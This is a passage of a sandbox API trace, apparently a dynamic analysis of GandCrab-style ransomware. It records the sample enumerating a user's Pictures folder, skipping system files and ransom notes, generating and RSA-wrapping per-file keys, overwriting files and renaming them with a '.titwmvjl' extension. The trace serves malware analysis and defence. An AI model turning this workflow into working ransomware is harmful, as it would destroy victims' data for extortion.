(lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\nStrFlun.jpg") returned 72 [0094.532] lstrcmpiW (lpString1="nStrFlun.jpg", lpString2="desktop.ini") returned 1 [0094.532] lstrcmpiW (lpString1="nStrFlun.jpg", lpString2="autorun.inf") returned 1 [0094.532] lstrcmpiW (lpString1="nStrFlun.jpg", lpString2="ntuser.dat") returned -1 [0094.532] lstrcmpiW (lpString1="nStrFlun.jpg", lpString2="iconcache.db") returned 1 [0094.532] lstrcmpiW (lpString1="nStrFlun.jpg", lpString2="bootsect.bak") returned 1 [0094.533] lstrcmpiW (lpString1="nStrFlun.jpg", lpString2="boot.ini") returned 1 [0094.533] lstrcmpiW (lpString1="nStrFlun.jpg", lpString2="ntuser.dat.log") returned -1 [0094.533] lstrcmpiW (lpString1="nStrFlun.jpg", lpString2="thumbs.db") returned -1 [0094.533] lstrcmpiW (lpString1="nStrFlun.jpg", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0094.533] lstrcmpiW (lpString1="nStrFlun.jpg", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0094.533] lstrcmpiW (lpString1="nStrFlun.jpg", lpString2="KRAB-DECRYPT.html") returned 1 [0094.533] lstrcmpiW (lpString1="nStrFlun.jpg", lpString2="CRAB-DECRYPT.html") returned 1 [0094.533] lstrcmpiW (lpString1="nStrFlun.jpg", lpString2="KRAB-DECRYPT.txt") returned 1 [0094.533] lstrcmpiW (lpString1="nStrFlun.jpg", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.533] lstrcmpiW (lpString1="nStrFlun.jpg", lpString2="ntldr") returned -1 [0094.533] lstrcmpiW (lpString1="nStrFlun.jpg", lpString2="NTDETECT.COM") returned -1 [0094.533] lstrcmpiW (lpString1="nStrFlun.jpg", lpString2="Bootfont.bin") returned 1 [0094.533] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\nStrFlun.jpg") returned 72 [0094.533] lstrlenW (lpString=".jpg") returned 4 [0094.533] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.533] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".jpg ") returned 5 [0094.533] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.533] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.533] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\nStrFlun.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\nstrflun.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0094.534] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.534] ReadFile (in: hFile=0x2c4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0094.534] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.534] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.535] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0094.535] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.535] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.535] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.535] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0094.535] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.536] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.536] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.536] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.536] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0094.536] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.536] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.537] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.537] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0094.537] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.537] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.537] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.537] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.537] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0094.537] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.538] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503638) returned 1 [0094.538] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.538] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0094.538] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.538] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0094.538] GetLastError () returned 0x0 [0094.538] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.538] CryptDestroyKey (hKey=0x503638) returned 1 [0094.538] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.538] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.539] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.539] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0094.539] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.539] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503478) returned 1 [0094.539] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.539] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0094.539] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.540] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0094.540] GetLastError () returned 0x0 [0094.540] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.540] CryptDestroyKey (hKey=0x503478) returned 1 [0094.540] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.540] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.540] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0094.540] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0094.540] ReadFile (in: hFile=0x2c4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ecb4*=0x348d, lpOverlapped=0x0) returned 1 [0094.606] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xffffcb73, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.607] WriteFile (in: hFile=0x2c4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x348d, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ec98*=0x348d, lpOverlapped=0x0) returned 1 [0094.608] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.608] WriteFile (in: hFile=0x2c4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0094.609] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.613] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.613] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.613] CloseHandle (hObject=0x2c4) returned 1 [0094.614] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\nStrFlun.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\nstrflun.jpg"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\nStrFlun.jpg.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\nstrflun.jpg.titwmvjl"), dwFlags=0x1) returned 1 [0094.614] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.615] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0094.615] lstrcmpW (lpString1="t dlC.bmp", lpString2=".") returned 1 [0094.615] lstrcmpW (lpString1="t dlC.bmp", lpString2="..") returned 1 [0094.615] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\", lpString2="t dlC.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\t dlC.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\t dlC.bmp" [0094.615] lstrlenW (lpString=".titwmvjl") returned 9 [0094.615] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\t dlC.bmp") returned 69 [0094.615] VirtualAlloc (lpAddress=0x0, dwSize=0xca, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.615] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\t dlC.bmp.titwmvjl") returned 78 [0094.615] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\t dlC.bmp") returned 69 [0094.615] lstrlenW (lpString=".bmp") returned 4 [0094.615] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.615] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".bmp ") returned 5 [0094.615] lstrcmpiW (lpString1=".bmp", lpString2=".titwmvjl") returned -1 [0094.615] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.615] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\t dlC.bmp") returned 69 [0094.615] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\t dlC.bmp") returned 69 [0094.615] lstrcmpiW (lpString1="t dlC.bmp", lpString2="desktop.ini") returned 1 [0094.616] lstrcmpiW (lpString1="t dlC.bmp", lpString2="autorun.inf") returned 1 [0094.616] lstrcmpiW (lpString1="t dlC.bmp", lpString2="ntuser.dat") returned 1 [0094.616] lstrcmpiW (lpString1="t dlC.bmp", lpString2="iconcache.db") returned 1 [0094.616] lstrcmpiW (lpString1="t dlC.bmp", lpString2="bootsect.bak") returned 1 [0094.616] lstrcmpiW (lpString1="t dlC.bmp", lpString2="boot.ini") returned 1 [0094.616] lstrcmpiW (lpString1="t dlC.bmp", lpString2="ntuser.dat.log") returned 1 [0094.616] lstrcmpiW (lpString1="t dlC.bmp", lpString2="thumbs.db") returned -1 [0094.616] lstrcmpiW (lpString1="t dlC.bmp", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0094.616] lstrcmpiW (lpString1="t dlC.bmp", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0094.616] lstrcmpiW (lpString1="t dlC.bmp", lpString2="KRAB-DECRYPT.html") returned 1 [0094.616] lstrcmpiW (lpString1="t dlC.bmp", lpString2="CRAB-DECRYPT.html") returned 1 [0094.616] lstrcmpiW (lpString1="t dlC.bmp", lpString2="KRAB-DECRYPT.txt") returned 1 [0094.616] lstrcmpiW (lpString1="t dlC.bmp", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.616] lstrcmpiW (lpString1="t dlC.bmp", lpString2="ntldr") returned 1 [0094.616] lstrcmpiW (lpString1="t dlC.bmp", lpString2="NTDETECT.COM") returned 1 [0094.616] lstrcmpiW (lpString1="t dlC.bmp", lpString2="Bootfont.bin") returned 1 [0094.616] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\t dlC.bmp") returned 69 [0094.616] lstrlenW (lpString=".bmp") returned 4 [0094.616] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.616] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".bmp ") returned 5 [0094.616] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.616] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.617] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\t dlC.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\t dlc.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0094.617] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.617] ReadFile (in: hFile=0x2c4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0094.618] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.618] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.618] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0094.618] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.619] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.619] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.619] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0094.619] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.619] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.619] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.619] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.619] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0094.620] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.620] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.620] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.620] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0094.620] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.620] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.620] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.620] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.620] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0094.621] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.621] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5031f8) returned 1 [0094.621] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.621] CryptGetKeyParam (in: hKey=0x5031f8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0094.621] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.621] CryptEncrypt (in: hKey=0x5031f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0094.622] GetLastError () returned 0x0 [0094.622] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.622] CryptDestroyKey (hKey=0x5031f8) returned 1 [0094.622] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.622] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.622] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.622] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0094.622] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.623] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503978) returned 1 [0094.623] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.623] CryptGetKeyParam (in: hKey=0x503978, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0094.623] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.623] CryptEncrypt (in: hKey=0x503978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0094.623] GetLastError () returned 0x0 [0094.623] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.623] CryptDestroyKey (hKey=0x503978) returned 1 [0094.623] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.624] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.624] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0094.624] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0094.624] ReadFile (in: hFile=0x2c4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ecb4*=0xeba, lpOverlapped=0x0) returned 1 [0094.632] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffff146, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.632] WriteFile (in: hFile=0x2c4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xeba, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ec98*=0xeba, lpOverlapped=0x0) returned 1 [0094.633] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.633] WriteFile (in: hFile=0x2c4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0094.644] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.647] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.648] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.648] CloseHandle (hObject=0x2c4) returned 1 [0094.648] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\t dlC.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\t dlc.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\t dlC.bmp.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\t dlc.bmp.titwmvjl"), dwFlags=0x1) returned 1 [0094.649] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.649] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0094.649] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0094.649] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0094.649] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\TITWMVJL-DECRYPT.txt" [0094.649] lstrlenW (lpString=".titwmvjl") returned 9 [0094.649] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\TITWMVJL-DECRYPT.txt") returned 80 [0094.649] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.650] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 89 [0094.650] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\TITWMVJL-DECRYPT.txt") returned 80 [0094.650] lstrlenW (lpString=".txt") returned 4 [0094.650] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.650] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0094.650] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0094.650] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.650] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\TITWMVJL-DECRYPT.txt") returned 80 [0094.650] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\TITWMVJL-DECRYPT.txt") returned 80 [0094.650] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0094.650] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0094.650] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0094.650] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0094.650] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0094.650] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0094.650] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0094.650] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0094.650] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.651] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0094.651] FindClose (in: hFindFile=0x503578 | out: hFindFile=0x503578) returned 1 [0094.651] CloseHandle (hObject=0x2bc) returned 1 [0094.651] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0094.651] lstrcmpW (lpString1="mZwy6pg ON", lpString2=".") returned 1 [0094.651] lstrcmpW (lpString1="mZwy6pg ON", lpString2="..") returned 1 [0094.651] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\", lpString2="mZwy6pg ON" | out: 